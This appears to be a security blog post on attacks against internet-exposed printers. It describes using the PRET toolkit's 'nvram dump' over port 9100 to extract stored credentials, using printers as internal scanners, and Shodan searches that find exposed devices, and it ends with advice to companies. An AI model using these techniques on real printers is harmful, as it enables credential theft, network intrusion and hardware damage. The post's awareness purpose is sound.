Over the past couple of months, a lot has been written about the Mirai botnet that was targeting vulnerable devices connected to the Internet. And based on the embedded password list, we can determine that the targets were diverse– from IP-camera’s, DVR’s, TV receivers, routers to printers. Printers? Yes, printers. Over the years, these devices have been transforming into full, multi-functional servers, often including embedded webservers for administrative purposes. But what many companies don’t realize is that these functionalities expose their printer to the Internet, actually better said, they open a backdoor to their company.
Back in 2007, during Red-Team exercises, we were using a tool developed by the hacking team Phenoelit called ‘Hijetter’.
By connecting to the Jetdirect engine over tcp port 9100, one would be able to acquire the configuration settings. What we used mostly was the ability to upload files. By uploading a custom port scanner written in Java, one could use the printer as a scanning device and bypass network white-listening in many cases, especially since no one expects a printer to attack internally.
There are many ways to attack a printer but in my humble opinion, the biggest two are either using it as a gateway into a company’s network or to dump information in order to obtain credentials.
In 2014, the security world was shaken up by the reveal of the ‘Heartbleed’ vulnerability in the OpenSSL cryptographic software library. By executing the exploit, an attacker could read the memory of the target’s machine and obtain credentials without leaving a trace.
The same kind of attack can be executed against internal, internet-connected printers.
But how exactly can this be done? As part of his master thesis, Jens Mueller researched the security of printers and how to hack them. Besides his detailed paper and website, he created a tool called ‘PRET’ – “Printer Exploitation Exploit Kit.”
The kit is able to execute a diversity of commands towards a printer, of course, once a connection is established (each command is well explained on his github page).
Though it is always interesting to learn about the configuration of the printer,—it has no password set, which means everybody inside the company and also from the outside world can connect and configure this printer.
Though the many options threat actors have to obtain info are concerning, like searching for other printers in the network by using SNMP, the option ‘NVRAM’ in particular really triggered me. NVRAM is used to store long-term settings, mostly those implemented by using FLASH RAM or an EEPROM. By using the option ‘nvram dump’, a threat actor can empty the NVRAM content of the printer and read credentials like POP3, domain credentials etc.
Here’s an example of executing this command:
To get an idea of how widespread this attack could be, we used the search-engine Shodan and looked for a particular combination that we knew is vulnerable to this attack.
Using two brands in particular, we searched for the ‘multifunction’ versions of the printers, which resulted in over 5000 hits belonging to the USA, South Korea, Australia, Japan, Germany and Canada. In two particular cases, a TV Broadcast station and a certain University in the US had a whole range of their printers connected to the Internet. Both institutes could be exposed through an attack and could be controlled remotely without leaving a trace.
As it turns out, we found several issues with regards to the PS and PJL printer protocols, including potential scenarios that could cause physical damage to the printer. You heard correctly. By overwriting values in NVRAM, the printer could be physically damaged and no longer work properly.
Therefore, it’s important to know that when adversaries are launching targeted attacks towards a company, the first phase is reconnaissance. After cybercriminals evaluate the information they’ve gathered, they’ll select the method of penetration with the goal of forming a beach-head in order to infiltrate the target’s network. So, when a printer is exposed to the internet, it easily gives away a beach-head and the adversary could operate undetected.
With this in mind, companies need to start asking themselves what would justify connecting printers to the internet, and what risks it could mean for their enterprise. This means from both an external and internal connection perspective. So, moral of the story: adequate (but workable) security measures should be taken to limit the possibility to misuse the printer.